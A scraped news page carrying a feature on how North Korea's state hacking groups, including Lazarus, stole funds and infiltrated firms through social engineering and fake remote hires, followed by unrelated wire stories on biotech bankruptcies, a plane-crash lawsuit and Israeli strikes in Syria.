How hermit kingdom North Korea became a hacking superpower
At first glance, 'Matt' looks like the perfect solution to your firm's evolving IT needs. He's worked for a small software outfit, and has a CV that suggests he is both a self-starter and a team player. He performs well in a Zoom interview, and soon gets hired, working from home on those late shifts that nobody else wants to do.
It's only a few weeks in, when your firm suffers a ransomware attack, that Matt's true nature as a 'team player' is revealed. For his real boss is the government of North Korea, where he's part of an elite team of state-trained hackers. The software firm that gave him glowing references was a fake, as was his job interview – courtesy of AI software that relayed a video image of someone else entirely.
Luckily, your firm is insured for cyberattacks, and in return for £1 million, Matt agrees not to wipe all your data. But not everyone who falls foul of North Korea's hackers gets away so lightly – as proved by February's catastrophic attack on the Dubai-based cryptocurrency exchange Bybit.
In a raid thought to have employed similar methods to the fictional scenario outlined above, a team from Pyongyang made off with $1.5bn (£1.2bn) – the largest heist in criminal history. The loot totalled nearly 50 times the £26 million stolen in London's Brink's-Mat robbery in 1983, and more, even, than Brad Pitt and George Clooney pinch in all three Oceans movies combined.
Indeed, the exploits of the Lazarus Group, as Pyongyang's cybercriminals are known, could generate a movie franchise in themselves. In 2016, they masterminded the Bangladesh Bank heist, in which nearly $100m was stolen via the SWIFT international payment system.
The following year came the global WannaCry attack, infiltrating out-of-date Windows systems in some 150 countries, including many used by Britain's NHS. It would, however, be a brave Hollywood film-maker who took on the Lazarus biopic. The group is most notorious for its attack on Sony Pictures in 2014, when it hacked the emails of the movie bosses behind The Interview, a film lampooning North Korean leader Kim Jong-Un.
Lazarus's prowess is all the more remarkable, given North Korea's reputation as a backward, Stalinist state. In a land where most people do not have a dumbphone, let alone an internet connection (a privilege limited to a few thousand high-ranking officials), where does one find computer-literate people? And, how, in turn, do they develop into some of the best hackers in the world, capable of plundering hundreds of millions of dollars worth of loot every year? After all, Bybit was not some time-warped backwater of Britain's health service, but the world's second largest cryptocurrency exchange, which prided itself on 'industry-leading security measures'.
To trace the answer, one has to go back to the late 1990s, when a shy adolescent North Korean student enrolled at a posh boarding school in Switzerland, telling other pupils he was a Pyongyang diplomat's son. In fact, it was a teenage Kim Jong Un, sent there secretly by his father, then-North Korean Supreme Leader Kim Jong-Il, to learn about life outside the hermit kingdom.
He was, by all accounts, an unremarkable student, spending much of his time playing video games. But one thing he did pick up was an acute awareness of how central computers were becoming to modern life. And when he and his brother, Kim Jong Chul returned home a few years later, that lesson was duly passed on.
'They were the ones who enlightened their father,' says Thae Yong Ho, Pyongyang's former ambassador to London, who defected to South Korea in 2016. 'Kim Jong Il quickly caught the advantages of these computers and networking.'
This was not so that North Korea's population could enjoy the mind-broadening benefits of the 'information superhighway', as it was then known. Kim Jong Il, Thae says, saw computerisation purely as a 'more efficient' way to run his police state, and soon set up specialist schools devoted to hi-tech spying, espionage and warfare. These gathered pace when Kim Jong-Un took over after his father's death in 2011, and paid handsome dividends five years later when hackers stole top-secret military plans from South Korea which included documents setting out how a feared war with the country's northern neighbour might play out, and a plot to 'decapitate' North Korea by assassinating Kim Jong Un.
But what began as an instrument for self-preservation has increasingly become one for self-enrichment. With North Korea's economy on its knees because of sanctions on its nuclear weapons program, Lazarus's ill-gotten gains are now a vital source of revenue.
It's also more efficient than previous regime scams, such as exporting crystal meth and getting embassies to use their diplomatic immunity for smuggling. In 2023, a UN monitoring body reported that cyber-theft accounted for half of the state's total foreign-currency revenue. The majority of the proceeds are thought to be spent on its weapons programme.
Today, North Korea's cyber-army is thought to be more than 8,000-strong, most of them talented maths students cherry-picked from school. Within North Korea, they operate within the innocuous-sounding Reconnaissance General Bureau, although when in action, their cyber noms de guerre include Lazarus, BeagleBoyz, Hidden Cobra, and APT38. (the 'APT' stands for 'advanced persistent threat.')
The system used to recruit them bears similarities to that used by the Soviets to hone athletes and chess prodigies during the Cold War, marked by long, gruelling hours of work, often away from family. There is precious little personal choice to exercise in North Korea, after all, but in return for service in what Kim Jong-Un refers to as his 'all-purpose sword' – gathering intel, waging cyberwarfare and raking in stolen funds – they get certain privileges.
These include exemption from service in state-run labour programs, material benefits such as cars and comfortable homes, and rare opportunities to travel abroad, such as to global maths contests like the International Mathematical Olympiad.
The Olympiad tests using applied maths to solve messy real-life problems – just the kind of lateral thinking required for hacking. North Korean contestants have consistently ranked in the top five in the contest – and true to form for hackers, have twice been caught cheating.
Yet it's not simply their hot-housed technical expertise that makes them so effective. For just as bank robbers often use insiders who know an institution's weak spots, most cyber-heists exploit human weakness, be it sending out 'phishing' emails, or befriending employees to fool them into divulging a password. Known in the trade as 'social engineering' – cybercrime-speak for an old-fashioned confidence trick – this is where disciplined North Koreans can be far more effective than the average private criminal gang.
'It really comes down to persistence,' says Sarah Kern, North Korea expert at US cyber-security firm SecureWorks. 'The North Koreans will carry out social engineering conversations and relationships over months or even longer, building a rapport with potential targets so that they will trust them enough to open a link with something malicious in it.'
This appears to be the technique used in the Bybit attack, which targeted the firm's third-party 'cold wallet' service – a secure storage facility that holds crypto-coin offline. To draw a conventional banking analogy, this is the rough equivalent of a vault from where bank tellers make periodic withdrawals to replenish their day-to-day trading stocks. According to reports, the attackers used social engineering to compromise the cold wallet computers ahead of a withdrawal by Bybit's executives. So when the executives signed off the transfer, the cash was diverted instead to the hackers.
Bybit has not disclosed the hackers' exact method. But in the hyper-online crypto-currency world – where many people go by pseudonyms anyway – it's not hard for Lazarus operatives to make friends. Kern, for example, says they will infiltrate online communities of blockchain engineers and software developers, slowly building up relationships. Hackers also rely on flattery, according to Jake Moore, a former police cybersecurity expert who works for European cybersecurity firm ESET. One tactic is to pose as online head-hunters on LinkedIn, approaching software developers with lucrative salary offers.
'They will tell someone they have the skill set for a very good job, then invite them for a quick online interview where they might disclose all kinds of info about the software programs they're currently using – stuff they'd never otherwise volunteer,' he says. 'At that point they might also be asked to click on an online job application form with malware in it. Another approach is to pose as a TV firm asking for an interview – anything that gets the target excited, and distracted from the usual security protocols.'
This, again, is what apparently happened at Bybit, whose third-party cold wallet service has reportedly blamed a Lazarus affiliate called TraderTraitor, which specifically targets cryptocurrency employees. According to the FBI, which first put out a warning about TraderTraitor two years ago, the group 'offers high-paying jobs to entice the recipients to download malware-laced cryptocurrency applications'.
So what will happen to the proceeds of Lazarus's $1.5bn heist? Unfortunately for Bybit, the deregulated nature of cryptocurrency makes it all too easy to launder funds. Within minutes of the heist, the hackers were feeding the cash through networks of other exchanges and cold-wallets, attempting to hide its origins.
Experts say the North Koreans are particularly good at this, with some suggesting they are the 'most sophisticated crypto launderers' ever, scooping up, on average, some 90 per cent of the funds they successfully target.
While some more reputable exchanges agreed to Bybit's requests to freeze the stolen funds, others have declined, meaning only a fraction is likely to be recovered. Networks of local fixers worldwide will already be laundering the money into legitimate banks, businesses and property investments, proceeds of which then ultimately filter back to Pyongyang. Some of this is thought to be done through China, which has long turned a blind eye to its neighbour's rackets.
Bybit is trying to make that process as hard as possible, courtesy of its new 'Lazarus Bounty' programme, whereby online sleuths who help trace the stolen funds get 10 per cent of anything recovered.
Yet not all of Lazarus's hacking activity is about large-scale theft. Last year, US prosecutors warned that thousands of North Korean hackers were obtaining high-paid jobs as remote-working IT experts in the US and Europe, taking advantage of the fact that in today's globalised, work-from-home business environment, many employees never set foot in a company office. Prosecutors issued a $5m bounty for the arrest of 14 North Koreans, whom it said posed online as US citizens to apply for tech jobs.
Some even got real-life US accomplices to pose in the job interviews for them, who'd then get company laptops sent to their home addresses. While the purpose of the attacks appeared to be simply to earn a regular paycheck – some jobs paid $300,000 per year – the hackers would often terminate their employment with a ransomware attack. Meanwhile, they were also gaining invaluable real-world experience of how US firms' tech systems operate.
Alarmingly for the UK, meanwhile, it was reported this week that North Koreans are increasingly infiltrating British companies by posing as remote employees. IT staff from the country have been hired for a number of web development and artificial intelligence projects, researchers at Google found, potentially aided by local facilitators.
For employers who think this kind of thing will never happen to them, Moore has a salutary tale about a 'social engineering' experiment he set up for a UK law firm that he advised. He created a fake online profile for 'Jessica', a young (and attractive) female law graduate, who messaged the firm's 100 employees via LinkedIn seeking work. Would they mind if she emailed them her CV?
'There was a piece of malware buried inside the CV, which would have given a real life hacker a way in,' says Moore. 'Most of the firm didn't fall for it, but three of them did, and even asked if she'd like to meet up for a drink. It's easier for hackers to operate than people think.'
Broaden your horizons with award-winning British journalism. Try The Telegraph free for 1 month with unlimited access to our award-winning website, exclusive app, money-saving offers and more.
Hashtags
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Miami Herald
39 minutes ago
- Miami Herald
Major healthcare business files for Chapter 11 bankruptcy
Biotechnology companies often encounter common challenges of long timelines for developing their products, the high costs associated with creating their innovations, and regulatory problems that must be solved to bring their inventions to market. Companies will amass huge amounts of debt over the years that's needed to develop medical devices, drugs, and other products, which can lead to financial distress and sometimes bankruptcy filings. Don't miss the move: Subscribe to TheStreet's free daily newsletter Over a 12-year period from 2011 through 2022, biotech firms filed fewer than 10 bankruptcies each year, but that changed beginning in 2023. Related: Key healthcare company files for Chapter 11 bankruptcy Biotech firms filed 14 cases in 2023, which was the highest number since 2010, when 14 firms filed for bankruptcy. Companies filed 13 petitions in 2024. Economic issues common to all businesses, such as rising costs of labor and products driven by inflation and rising inflation, played a role in distress over the last two years. AmplifyBio, which develops next-generation vaccines, medicine, and therapeutics, filed for Chapter 11 protection on May 17, 2025, seeking to sell all of its assets and liquidate through the bankruptcy process. The debtor's largest creditors included certain shareholders, including Battelle Services Co., owed $3.25 million; Battelle Memorial Institute, owed $1.89 million; and Kavra 14 LLC, owed $1.8 million. Distressed biotechnology company Synthego Corp. filed for Chapter 11 bankruptcy protection on May 5, seeking to sell its assets to its prepetition lender Perceptive Credit Holdings III L.P. in a bankruptcy sale with a stalking-horse bid calling for a credit bid of $74.4 million of debt owed to the lender, as well as a $12.5 million DIP financing. Austin, Texas-based biotechnology company Molecular Templates Inc., which develops cancer treatment drugs, filed for Chapter 11 bankruptcy on April 20, 2025, with plans to hand its assets to its secured lender as part of a restructuring support agreement. And now, medical diagnostics company Capture Collective Inc., which is developing and commercializing medical testing equipment for early detection of radiation exposure, and two affiliates, filed for Chapter 11 bankruptcy protection on May 27 to reorganize their debts, facing high litigation costs. Related: Major health care company files for bankruptcy to sell assets The company listed $1 million to $10 million in assets and liabilities in its petition filed in the U.S. Bankruptcy Court for the Southern District of Ohio, including a $5.7 million disputed tax claim owed to its largest creditor Hawaii Department of Taxation. More bankruptcy: Iconic auto repair chain franchise files Chapter 11 bankruptcyPopular beer brand closes down and files Chapter 7 bankruptcyPopular vodka and gin brand files for Chapter 11 bankruptcy The Columbus, Ohio-based debtor and affiliates Capture Diagnostics LLC and Capture Diagnostics HIB01 had also faced costly contract disputes as a result of its Covid-19 testing business that ceased operations in May 2023. Capture Collective was unable to resolve the contract disputes with claimants after the Covid-19 testing business ended. The company said high litigation costs had exhausted all of its remaining capital resources and made it impossible for the company to obtain new venture capital, according to information provided by RK Consultants. All litigation filed against Capture Collective and its affiliates is subject to an automatic stay while the bankruptcy case proceeds. Capture Collective is developing the radiation biodosimetry diagnostic test, MiRAD, a high-throughput, microRNA biomarker-based biodosimetry assay, which enables individualized clinical biomarker quantification in direct correlation with radiation exposure. Related: Another major healthcare company files Chapter 11 bankruptcy The Arena Media Brands, LLC THESTREET is a registered trademark of TheStreet, Inc.
Yahoo
39 minutes ago
- Yahoo
‘Something you can never replace': NC widows sue Myrtle Beach aviation company after husbands 2022 plane crash deaths
HORRY COUNTY, S.C. (WBTW) — Two North Carolina widows say they're heartbroken and frustrated after filing a federal lawsuit in February against a Myrtle Beach-based aviation company that may be liable for the deaths of their husbands. 'As much as we don't want to go to trial, we will do anything for justice,' widow Toni Titone said. Terry Druffel and Barrie McMurtrie died in a single-engine plane crash in a wooded area outside of Conway in September 2022. Almost six hours after the crash, widow Linda Druffel says the Horry County coroner called her and Toni Titone to tell them their husbands died at the scene. The widows told News13 the plane was in flames when it crashed. They say authorities could not identify their husbands until they found McMurtrie's logbook. 'This is the only thing I have left of my husband,' Linda said, holding the center of her necklace. 'It's his wedding ring from that crash.' The widows' wrongful death and negligence lawsuit says Druffel and McMurtrie flew McMurtrie's single-engine Piper PA-28R on September 14, 2022. The lawsuit claims Myrtle Beach-based Executive Helijet Aviation worked on that plane months earlier. Linda says experts who examined the plane told her, within about 10 minutes of the flight, oil started leaking from the engine. When Druffel and McMurtrie tried to land in a landfill area, their right wing hit a tree. Titone and Linda say their husbands were experienced pilots. McMurtrie flew for 30 years. Druffel spent 24 years in the Navy as a helicopter pilot and 25 years with his commercial pilot's license. 'My nephews, today, just got their private pilot's licenses because of Uncle Terry, who started flying with them when they were little boys,' Linda said. In its final report in December 2023, the National Transportation Safety Board said the probable cause of the crash was the mechanic's failure to install a required gasket on the vacuum pump drive pad, which led to a loss of engine power. Linda said 16 months before Druffel and McMurtrie died, another pilot crashed and died after Executive Helijet Aviation allegedly put equipment into his plane upside down. 'Three wonderful pilots, three wonderful men, were killed because of their negligence,' Linda said. Titone says Executive Helijet's insurance company initially offered her and Linda a $2 million policy. However, the insurance company eventually told the widows they would not be getting that money. Linda and Titone are suing the aviation company for more than $75,000. 'We didn't just lose our husbands,' Titone said. 'We lost a lot of financial stability, and we lost love.' 'We lost something you can never replace,' Linda added. In response to the widows' complaint, Executive Helijet Aviation denies any liability for the crash. News13 reached out to Executive Helijet's lawyer, but we have not heard back. Court records show jury selection is set for March 2, 2026. * * * Skylar Musick is a multimedia journalist at News13. Skylar is originally from Long Island, New York. She joined the News13 team in June 2024 after graduating from Villanova University in May 2024. Follow Skylar on X, formerly Twitter, Facebook, or Instagram, and read more of her work here. Copyright 2025 Nexstar Media, Inc. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed.
Yahoo
39 minutes ago
- Yahoo
Israel launches strikes on weapons in Syria
Israel said it had launched strikes on weapons belonging to Syria, hours after reports that two projectiles had been fired from Syria into Israel on Tuesday. The Israeli strikes on southern Syria caused "significant human and material losses", Syria's foreign ministry said, adding that Israel was "trying to destabilise the region". Israeli Defence Minister Israel Katz said he held Syrian interim President Ahmed al-Sharaa responsible for the projectiles launched into Israel. Despite recent indirect talks to ease tensions between the two countries, Israel has stepped up attacks on targets in Syria since Sharaa led a rebel offensive that overthrew Bashar al-Assad's regime in December 2024. "Violent explosions shook southern Syria, notably the town of Quneitra and the Daraa region, following Israeli aerial strikes," said the Syrian Observatory of Human Rights, a UK-based monitoring group. In a statement, Syria's foreign ministry said: "This escalation constitutes a blatant violation of Syrian sovereignty and aggravates tensions in the region. "Syria has never been and will never be a threat to anyone in the region." It was unclear how many people were killed or injured in Israel's strikes. Israel said the strikes came after two projectiles launched from Syria landed in open areas of the country, causing no injuries. Israeli media reported that the strikes were the first launched from Syria since the fall of the Bashar al-Assad regime. It was not immediately clear who fired the projectiles. "We consider the president of Syria directly responsible for any threat and fire toward the State of Israel," Katz said. Syria's foreign ministry said reports of the launches from inside Syria "have not been verified yet". When the Assad regime was deposed, Israel launched a wave of attacks to degrade Syrian military infrastructure. It has also encouraged the expansion of settlements in the occupied Golan Heights, territory which Israel seized from Syria in 1976 and is considered illegally occupied under international law. Last month, US President Donald Trump announced plans to lift decade-old sanctions on Syria, imposed in response to atrocities committed by forces loyal to Assad during a 13-year civil war. During that conflict, more than 600,000 people were killed and 12 million others were forced from their homes. Last month, Israel bombed an area near Syria's presidential palace in Damascus, a strike which Israeli Prime Minister Benjamin Netanyahu said was a "clear message" that it would "not allow the deployment of forces south of Damascus". UN Secretary-General Antonio Guterres said the bombing was a "violation of Syria's sovereignty".
